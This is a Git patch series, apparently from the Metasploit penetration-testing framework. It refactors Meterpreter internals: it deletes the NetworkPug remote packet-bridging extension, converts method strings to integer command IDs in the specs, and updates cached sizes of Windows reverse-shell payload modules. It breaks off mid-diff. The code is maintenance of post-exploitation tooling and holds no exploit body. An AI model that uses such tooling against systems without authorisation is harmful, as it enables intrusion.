Date: Tue, 5 May 2020 09:15:44 +1000
Subject: [PATCH 06/20] Remove networkpug

This thing doesn't exist any more, so no need to have code referencing
it.
---
 .../extensions/networkpug/command_ids.rb      |  19 --
 .../extensions/networkpug/networkpug.rb       |  63 -----
 .../meterpreter/extensions/networkpug/tlv.rb  |  16 --
 .../console/command_dispatcher/networkpug.rb  | 232 ------------------
 4 files changed, 330 deletions(-)
 delete mode 100644 lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb
 delete mode 100644 lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
 delete mode 100644 lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
 delete mode 100644 lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb

diff --git a/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb b/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb
deleted file mode 100644
index 569fe9a31d85d..0000000000000
--- a/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb
+++ /dev/null
@@ -1,19 +0,0 @@
-# -*- coding: binary -*-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module NetworkPug
-
-# ID for the extension (needs to be a multiple of 1000)
-EXTENSION_ID_NETWORKPUG = 6000
-
-# Associated command ids
-COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1
-COMMAND_ID_NETWORKPUG_STOP  = EXTENSION_ID_NETWORKPUG + 2
-
-end
-end
-end
-end
-end
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
deleted file mode 100644
index d5810df46f896..0000000000000
--- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
+++ /dev/null
@@ -1,63 +0,0 @@
-# -*- coding: binary -*-
-
-require 'rex/post/meterpreter/extensions/networkpug/tlv'
-require 'rex/post/meterpreter/extensions/networkpug/command_ids'
-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module NetworkPug
-
-# NetworkPug implements a remote packet recieve/send on a network interface
-# on the remote machine
-
-class NetworkPug < Extension
-
-  def self.extension_id
-    EXTENSION_ID_NETWORKPUG
-  end
-
-  def initialize(client)
-    super(client, 'networkpug')
-
-    client.register_extension_aliases(
-      [
-        {
-          'name' => 'networkpug',
-          'ext'  => self
-        },
-      ])
-  end
-
-  def networkpug_start(interface, filter)
-    request = Packet.create_request(COMMAND_ID_NETWORKPUG_START)
-    request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface)
-    request.add_tlv(TLV_TYPE_NETWORKPUG_FILTER, filter) if(filter and filter != "")
-    response = client.send_request(request)
-
-    channel = nil
-    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
-
-    if(channel_id)
-      channel = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(
-        client,
-        channel_id,
-        'networkpug_interface',
-        CHANNEL_FLAG_SYNCHRONOUS,
-        response
-      )
-    end
-
-    return response, channel
-  end
-
-  def networkpug_stop(interface)
-    request = Packet.create_request(COMMAND_ID_NETWORKPUG_STOP)
-    request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface)
-    client.send_request(request)
-  end
-
-end
-
-end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
deleted file mode 100644
index 54e5941ab8ab9..0000000000000
--- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
+++ /dev/null
@@ -1,16 +0,0 @@
-# -*- coding: binary -*-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module NetworkPug
-
-TLV_TYPE_EXTENSION_NETWORKPUG	= 0
-TLV_TYPE_NETWORKPUG_INTERFACE	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1)
-TLV_TYPE_NETWORKPUG_FILTER	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2)
-
-end
-end
-end
-end
-end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
deleted file mode 100644
index 5782aed2d272a..0000000000000
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
+++ /dev/null
@@ -1,232 +0,0 @@
-# -*- coding: binary -*-
-require 'rex/post/meterpreter'
-
-module Rex
-module Post
-module Meterpreter
-module Ui
-
-# Rex::Ui::Text::IrbShell.new(binding).run
-
-class Console::CommandDispatcher::NetworkPug
-
-  Klass = Console::CommandDispatcher::NetworkPug
-
-  include Console::CommandDispatcher
-
-  @@options = Rex::Parser::Arguments.new(
-    "-i" => [ true, "Interface on remote machine to listen on" ],
-    "-f" => [ true, "Additional pcap filtering mechanism" ],
-    "-v" => [ false, "Virtual NIC (packets only for your TAP dev locally)" ]
-  )
-
-  def initialize(shell)
-    @thread_stuff = nil
-    @tapdev = nil
-    @channel = nil
-
-    super
-  end
-
-  attr_accessor :thread_stuff
-  attr_accessor :tapdev
-  attr_accessor :channel
-
-
-  #
-  # List of supported commands.
-  #
-  def commands
-    {
-      'networkpug_start' => 'Start slinging packets between hosts',
-      'networkpug_stop'  => 'Stop slinging packets between hosts',
-    }
-  end
-
-  def setup_tapdev
-    # XXX, look at how to use windows equivilient and include
-
-    tapdev = ::File.open("/dev/net/tun", "wb+")
-
-    0.upto(16) { |idx|
-      name = "npug#{idx}"
-
-      ifreq = [ name, 0x1000 | 0x02, "" ].pack("a16va14")
-
-      begin
-        tapdev.ioctl(0x400454ca, ifreq)		# is there a better way than hex constant
-      rescue Errno::EBUSY
-        next
-      end
-
-      ifreq = [ name ].pack("a32")
-
-      tapdev.ioctl(0x8927, ifreq)
-
-      # print_line(Rex::Text.hexify(ifreq))
-
-      mac = sprintf("%02x:%02x:%02x:%02x:%02x:%02x", ifreq[18], ifreq[19], ifreq[20], ifreq[21], ifreq[22], ifreq[23])
-
-      return tapdev, name, mac
-    }
-
-    tapdev.close()
-    return nil, nil, nil
-  end
-
-  def proxy_packets()
-    while True
-      # Ghetto :\
-
-      sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil)
-
-      sd[0].each { |s|
-        if(s == @channel.lsock)	# Packet from remote host to local TAP dev
-          len = @channel.lsock.read(2)
-          len = len.unpack('n')[0]
-
-          #print_line("Got #{len} bytes from remote host's network")
-
-          if(len > 1514 or len == 0)
-            @tapdev.close()
-            print_line("length is invalid .. #{len} ?, de-synchronized ? ")
-          end
-
-          packet = @channel.lsock.read(len)
-
-          print_line("packet from remote host:\n" + Rex::Text.hexify(packet))
-
-          @tapdev.syswrite(packet)
-
-        elsif(s == @tapdev)
-          # Packet from tapdev to remote host network
-
-          packet = @tapdev.sysread(1514)
-
-          print_line("packet to remote host:\n" + Rex::Text.hexify(packet))
-
-          @channel.write(packet)
-        end
-      } if(sd)
-
-      if(not sd)
-        print_line("hmmm. ")
-      end
-    end
-  end
-
-  def cmd_networkpug_start(*args)
-    # PKS - I suck at ruby ;\
-
-    virtual_nic = false
-    filter = nil
-    interface = nil
-
-    if(args.length == 0)
-      args.unshift("-h")
-    end
-
-    @@options.parse(args) { |opt, idx, val|
-      # print_line("before: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
-      case opt
-        when "-v"
-          virtual_nic = true
-
-        when "-f"
-          filter = val
-
-        when "-i"
-          interface = val
-
-        when "-h"
-          print_error("Usage: networkpug_start -i interface [options]")
-          print_error("")
-          print_error(@@options.usage)
-      end
-      # print_line("after: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
-
-    }
-
-    if (interface == nil)
-      print_error("Usage: networkpug_start -i interface [options]")
-      print_error("")
-      print_error(@@options.usage)
-      return
-    end
-
-    @tapdev, tapname, mac = setup_tapdev
-
-    if(@tapdev == nil)
-      print_status("Failed to create tapdev")
-      return
-    end
-
-    # PKS, we should implement multiple filter strings and let the
-    # remote host build it properly.
-    # not (our conn) and (virtual nic filter) and (custom filter)
-    # print_line("before virtual, filter is #{filter}")
-
-    if(filter == nil and virtual_nic == true)
-      filter = "ether host #{mac}"
-    elsif(filter != nil and virtual_nic == true)
-      filter += " and ether host #{mac}"
-      #print_line("Adjusted filter is #{filter}")
-    end
-
-    print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done")
-
-    _, @channel = client.networkpug.networkpug_start(interface, filter)
-
-    if(@channel)
-      @thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) {
-        proxy_packets()
-      }
-
-      print_line("Packet slinger for #{interface} has a thread structure of #{@thread_stuff}")
-    end
-
-    return true
-  end
-
-  def cmd_networkpug_stop(*args)
-    interface = args[0]
-    if (interface == nil)
-      print_error("Usage: networkpug_stop [interface]")
-      return
-    end
-
-    client.networkpug.networkpug_stop(interface)
-
-    #print_line("client.networkpug.networkpug_stop returned")
-
-    if(@thread_stuff)
-      # print_line("killing thread")
-      @thread_stuff.kill
-
-      #print_line("joining thread")
-      #@thread_stuff.join
-      # meterpreter dies if i try to join.. not sure why.
-
-      @thread_stuff = nil
-
-      #print_line("closing tapdev")
-      @tapdev.close
-
-      #print_line("closing channel")
-      #@channel.close
-    end
-
-    print_status("Packet slinging stopped on #{interface}")
-    return true
-  end
-
-  def name
-    "NetworkPug"
-  end
-
-end
-
-end
-end
-end
-end

From 2ed4fa251f14e0c6ffe95eed087af48bf3267987 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 5 May 2020 10:59:46 +1000
Subject: [PATCH 07/20] Somehow lost a bang!

Thanks @sempervictus
---
 lib/rex/post/meterpreter/extension_mapper.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb
index 320ab7fc2585d..2c6657913d890 100644
--- a/lib/rex/post/meterpreter/extension_mapper.rb
+++ b/lib/rex/post/meterpreter/extension_mapper.rb
@@ -14,7 +14,7 @@ def self.get_extension_id(name)
   end
 
   def self.get_extension_klass(name)
-    name.downcase
+    name.downcase!
 
     unless @@klasses[name]
       require("rex/post/meterpreter/extensions/#{name}/#{name}")

From 616fdaeb603df0e6d0d554f1db154f654efa1b2d Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 5 May 2020 12:28:42 +1000
Subject: [PATCH 08/20] Fix up packe spec tests

---
 lib/rex/post/meterpreter/packet.rb           |  4 +--
 spec/lib/rex/post/meterpreter/packet_spec.rb | 30 ++++++++++----------
 2 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index f46fa6a4cef3a..f9e650dddb7c5 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -272,9 +272,9 @@ def inspect
       }
       tlvs_inspect << "]"
     else
-      tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}"
+      tlvs_inspect = "meta=#{meta.ljust(10)} value=#{val}"
     end
-    "#<#{self.class} type=#{stype} #{tlvs_inspect}>"
+    "#<#{self.class} type=#{stype.ljust(15)} #{tlvs_inspect}>"
   end
 
   ##
diff --git a/spec/lib/rex/post/meterpreter/packet_spec.rb b/spec/lib/rex/post/meterpreter/packet_spec.rb
index bd8dc1245104c..438a03873c1cc 100644
--- a/spec/lib/rex/post/meterpreter/packet_spec.rb
+++ b/spec/lib/rex/post/meterpreter/packet_spec.rb
@@ -117,19 +117,19 @@
     end
   end
 
-  context "A Method TLV" do
+  context "A Command ID TLV" do
     subject(:tlv) {
       Rex::Post::Meterpreter::Tlv.new(
-        Rex::Post::Meterpreter::TLV_TYPE_METHOD,
-        "test"
+        Rex::Post::Meterpreter::TLV_TYPE_COMMAND_ID,
+        31337
       )
     }
-    it "should have a meta type of String" do
-      expect(tlv.meta_type?(Rex::Post::Meterpreter::TLV_META_TYPE_STRING)).to eq true
+    it "should have a meta type of UINT" do
+      expect(tlv.meta_type?(Rex::Post::Meterpreter::TLV_META_TYPE_UINT)).to eq true
     end
 
     it "should show the correct type and meta type in inspect" do
-      tlv_to_s = "#<Rex::Post::Meterpreter::Tlv type=METHOD          meta=STRING     value=\"test\">"
+      tlv_to_s = "#<Rex::Post::Meterpreter::Tlv type=COMMAND-ID      meta=INT        value=31337>"
       expect(tlv.inspect).to eq tlv_to_s
     end
   end
@@ -389,7 +389,7 @@
     subject(:packet) {
       Rex::Post::Meterpreter::Packet.new(
         Rex::Post::Meterpreter::PACKET_TYPE_REQUEST,
-        "test_method"
+        31337
       )
     }
 
@@ -430,17 +430,17 @@
     end
 
     it "should evaluate the method correctly" do
-      expect(packet.method?("test_method")).to eq true
-      expect(packet.method?("blah")).to eq false
+      expect(packet.method?(31337)).to eq true
+      expect(packet.method?(0xdead)).to eq false
     end
 
     it "should accept new methods" do
-      packet.method= "test_method2"
-      expect(packet.method?("test_method2")).to eq true
+      packet.method= 0xc0ffee
+      expect(packet.method?(0xc0ffee)).to eq true
     end
 
     it "should return the correct method" do
-      expect(packet.method).to eq "test_method"
+      expect(packet.method).to eq 31337
     end
 
     it "should not have a result" do
@@ -452,10 +452,10 @@
     end
 
     it "should be created when Packet.create_request is called" do
-      req = Rex::Post::Meterpreter::Packet.create_request("test_method")
+      req = Rex::Post::Meterpreter::Packet.create_request(31337)
       expect(req.class).to eq Rex::Post::Meterpreter::Packet
       expect(req.response?).to eq false
-      expect(req.method?("test_method")).to eq true
+      expect(req.method?(31337)).to eq true
     end
 
     it "should return the correct raw byte form of the packet" do
@@ -473,7 +473,7 @@
     subject(:packet) {
       Rex::Post::Meterpreter::Packet.new(
         Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE,
-        "test_method"
+        31337
       )
     }
     before(:example) do

From 30a23c470b3b8d3b973adc95b7a570ffd970a4de Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 5 May 2020 13:27:13 +1000
Subject: [PATCH 09/20] Update payload cache sizes

---
 modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb | 2 +-
 modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb | 2 +-
 modules/payloads/singles/windows/meterpreter_bind_tcp.rb        | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_http.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_https.rb   | 2 +-
 .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_tcp.rb     | 2 +-
 .../payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb | 2 +-
 .../payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_https.rb   | 2 +-
 .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb         | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +-
 modules/payloads/stagers/windows/encrypted_reverse_tcp.rb       | 2 +-
 modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb   | 2 +-
 16 files changed, 16 insertions(+), 16 deletions(-)

diff --git a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
index 2313a5a7d79e9..8e6c1f38e114c 100644
--- a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 4416
+  CachedSize = 4352
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
index 844c0d8f993db..626c331b3c4df 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176195
+  CachedSize = 176198
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index 85aaeecafdf36..b84f131cf1bf8 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176195
+  CachedSize = 176198
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index 3dee4737f9eae..52a59ffbc536d 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 177241
+  CachedSize = 177244
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 5bcac15bee097..d1efef0e15483 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 177241
+  CachedSize = 177244
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 990e93e51da88..868c2ea691761 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176195
+  CachedSize = 176198
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index edd181b0e674c..2a109914a82d2 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176195
+  CachedSize = 176198
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
index 53083adaf2475..8a921fe186205 100644
--- a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 4000
+  CachedSize = 4064
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
index 743a8e8ef1a95..9d5b4a167ddb6 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201283
+  CachedSize = 201286
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index dc832d5f59a30..2473cb95a0243 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201283
+  CachedSize = 201286
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index d2e5281294cc7..7dd31a44a4c4e 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 202329
+  CachedSize = 202332
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index d36ec6555234e..21c0aa7535d04 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 202329
+  CachedSize = 202332
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index 9e23dae59f3a1..a6f5a125f1745 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201283
+  CachedSize = 201286
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index a486a85665eab..2a1139d0f92fe 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201283
+  CachedSize = 201286
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
index dd2c8e7f0d3f1..6ae7561f887e8 100644
--- a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 2880
+  CachedSize = 2848
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::EncryptedReverseTcp
diff --git a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
index 67fb7bb327647..74f709532087b 100644
--- a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 2560
+  CachedSize = 2576
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::EncryptedReverseTcp

From c08e86434b02a92250eb1ec70f5613facbf1c18f Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 5 May 2020 14:23:32 +1000
Subject: [PATCH 10/20] Fix more specs

---
 lib/rex/post/meterpreter/extension_mapper.rb        | 7 ++++++-
 lib/rex/post/meterpreter/packet.rb                  | 1 +
 spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 4 ++--
 3 files changed, 9 insertions(+), 3 deletions(-)

diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb
index 2c6657913d890..057ff9c9853a5 100644
--- a/lib/rex/post/meterpreter/extension_mapper.rb
+++ b/lib/rex/post/meterpreter/extension_mapper.rb
@@ -17,7 +17,12 @@ def self.get_extension_klass(name)
     name.downcase!
 
     unless @@klasses[name]
-      require("rex/post/meterpreter/extensions/#{name}/#{name}")
+      begin
+        require("rex/post/meterpreter/extensions/#{name}/#{name}")
+      rescue LoadError
+        # the extension doesn't exist on disk
+        raise RuntimeError, "Unable to load extension '#{name}' - module does not exist."
+      end
       s = Rex::Post::Meterpreter::Extensions.constants.select { |c|
         name == c.to_s.downcase
       }[0]
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index f9e650dddb7c5..8d1e20df7c163 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -914,6 +914,7 @@ def method?(method)
   # Sets the packet's method TLV to the method supplied.
   #
   def method=(method)
+    raise ArgumentError.new('Packet.method must be an integer') unless method.is_a?(Integer)
     add_tlv(TLV_TYPE_COMMAND_ID, method, true)
   end
 
diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
index c45496a4cf090..2e8f1b039391b 100644
--- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
+++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
@@ -8,7 +8,7 @@
     Rex::Post::Meterpreter::PacketParser.new
   }
   before(:example) do
-    @request_packet = Rex::Post::Meterpreter::Packet.create_request("test_method")
+    @request_packet = Rex::Post::Meterpreter::Packet.create_request(31337)
     @sock = StringIO.new(@request_packet.to_r)
   end
 
@@ -19,7 +19,7 @@
     parsed_packet.from_r
     expect(parsed_packet).to be_a Rex::Post::Meterpreter::Packet
     expect(parsed_packet.type).to eq Rex::Post::Meterpreter::PACKET_TYPE_REQUEST
-    expect(parsed_packet.method?("test_method")).to eq true
+    expect(parsed_packet.method?(31337)).to eq true
   end
 
 end

From 19f771f6ec39d56fa2c623182b8231ae827e2b4a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 8 May 2020 14:43:41 +1000
Subject: [PATCH 11/20] Fix missed cases of method strings

---
 lib/rex/post/meterpreter/channel.rb                     | 8 ++++----
 lib/rex/post/meterpreter/channels/socket_abstraction.rb | 2 +-
 lib/rex/post/meterpreter/packet_dispatcher.rb           | 2 +-
 3 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb
index eb1be874cd9e1..fc6accad0efa4 100644
--- a/lib/rex/post/meterpreter/channel.rb
+++ b/lib/rex/post/meterpreter/channel.rb
@@ -397,12 +397,12 @@ def dio_close_handler(packet)
   # per-instance basis as other instances may add custom dio
   # handlers.
   #
-  def dio_map(method)
-    if (method == 'core_channel_read')
+  def dio_map(command_id)
+    if command_id == COMMAND_ID_CORE_CHANNEL_READ
       return CHANNEL_DIO_READ
-    elsif (method == 'core_channel_write')
+    elsif command_id == COMMAND_ID_CORE_CHANNEL_WRITE
       return CHANNEL_DIO_WRITE
-    elsif (method == 'core_channel_close')
+    elsif command_id == COMMAND_ID_CORE_CHANNEL_CLOSE
       return CHANNEL_DIO_CLOSE
     end
 
diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb
index c073303d03ec5..3320c105e5deb 100644
--- a/lib/rex/post/meterpreter/channels/socket_abstraction.rb
+++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb
@@ -89,7 +89,7 @@ def syswrite(buf)
   def initialize(client, cid, type, flags, packet, **_)
     # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called
     # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel
-    # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write'
+    # is registered (client.add_channel(self) in Channel.initialize) to a session and a COMMAND_ID_CORE_CHANNEL_WRITE
     # request comes in before we have called self.initialize_abstraction()
     initialize_abstraction
     super(client, cid, type, flags, packet)
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index c37c5fdd12ee1..c96f8ad06fd2f 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -369,7 +369,7 @@ def monitor_socket
             tmp_command << pkt
             next
           end
-          if(pkt.method == "core_channel_close")
+          if(pkt.method == COMMAND_ID_CORE_CHANNEL_CLOSE)
             tmp_close << pkt
             next
           end

From b9013e32fa1e02c55fbbc8c012820ccbdc59aaa5 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 8 May 2020 21:56:18 +1000
Subject: [PATCH 12/20] Re-remove the filter on the sniffer extension

Not sure why, but this is causing issues. Gross.
---
 .../ui/console/command_dispatcher/sniffer.rb  | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index a8d1a44898755..c9c6f190b9438 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -30,7 +30,7 @@ def initialize(shell)
   # List of supported commands.
   #
   def commands
-    all = {
+    {
